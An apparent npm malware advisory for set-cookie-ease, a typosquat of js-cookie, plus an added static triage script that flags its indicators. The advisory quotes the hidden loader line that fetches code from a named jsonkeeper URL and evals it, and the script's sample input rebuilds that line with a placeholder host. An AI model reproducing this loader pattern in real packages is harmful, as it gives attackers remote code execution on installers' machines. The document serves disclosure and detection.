npm

set-cookie-ease @1.1.5

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 2:48 PM UTC

Malicious

OSV ID

MAL-2026-6500

Ecosystem

npm

Summary

Package masquerades as js-cookie (same banner /*! js-cookie v3.0.5 | MIT */, README, and repository.url: git://github.com/js-cookie/js-cookie.git) but diverges in dist/cookie.ease.js. At lines 46-49, the Cookies.set implementation contains if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }. The base64 string decodes to https://www.jsonkeeper.com/b/VKUNI, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever document is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes expires: 0, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, package.json adds axios and request as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.

Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)
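Added example, not part of the report or of either package: a Node.js static triage function that checks a package manifest and source text for the indicators the summary describes. The function names, sample manifest, dependency version ranges and encoded URL are constructed for illustration; the code only reads strings and never fetches or executes anything.

```javascript
// Static triage for the indicators in this report: impersonated repository,
// network dependencies, eval of fetched content, and base64-hidden URLs.
const IMPERSONATED = { name: 'js-cookie', repo: 'github.com/js-cookie/js-cookie' };

// Decode atob('...') string literals so a reviewer can see the destination.
function decodeBase64Literals(source) {
  const re = /atob\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)/g;
  return [...source.matchAll(re)].map((m) => Buffer.from(m[2], 'base64').toString('utf8'));
}

function triagePackage(pkg, source) {
  const findings = [];
  const repo = pkg.repository || '';
  const repoUrl = typeof repo === 'string' ? repo : repo.url || '';
  // Claims another project's repository under a different package name.
  if (pkg.name !== IMPERSONATED.name && repoUrl.includes(IMPERSONATED.repo)) {
    findings.push('repository-mismatch');
  }
  // A cookie helper advertised as dependency-free should not pull HTTP clients.
  const netDeps = Object.keys(pkg.dependencies || {}).filter((d) => ['axios', 'request'].includes(d));
  if (netDeps.length) findings.push('unexpected-network-deps:' + netDeps.join(','));
  const hasEval = /\beval\s*\(/.test(source);
  // eval() in a file that also loads an HTTP client.
  if (hasEval && /require\(\s*['"](axios|request)['"]\s*\)/.test(source)) {
    findings.push('eval-of-remote-content');
  }
  // Behaviour gated on "document is undefined", i.e. Node/SSR only.
  if (hasEval && /typeof\s+document\s*===\s*['"]undefined['"]/.test(source)) {
    findings.push('server-side-only-branch');
  }
  for (const s of decodeBase64Literals(source)) {
    if (/^https?:\/\//.test(s)) findings.push('hidden-url:' + new URL(s).hostname);
  }
  return findings;
}

// Constructed sample input mirroring the shape quoted in the summary.
const samplePkg = {
  name: 'set-cookie-ease',
  repository: { url: 'git://github.com/js-cookie/js-cookie.git' },
  dependencies: { axios: '*', request: '*' }, // version ranges are placeholders
};
const encoded = Buffer.from('https://payload.example.invalid/b/PLACEHOLDER').toString('base64');
const sampleSource =
  "if (typeof document === 'undefined' || attributes.expires == 0) { " +
  "require('axios').get(atob('" + encoded + "')).then(r => { eval(r.data.content) }); return }";

console.log(triagePackage(samplePkg, sampleSource));
```

Run it against the `package.json` and `dist/` files of an unpacked tarball (`npm pack <name>` followed by extraction) rather than an installed copy, so no package code is loaded.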
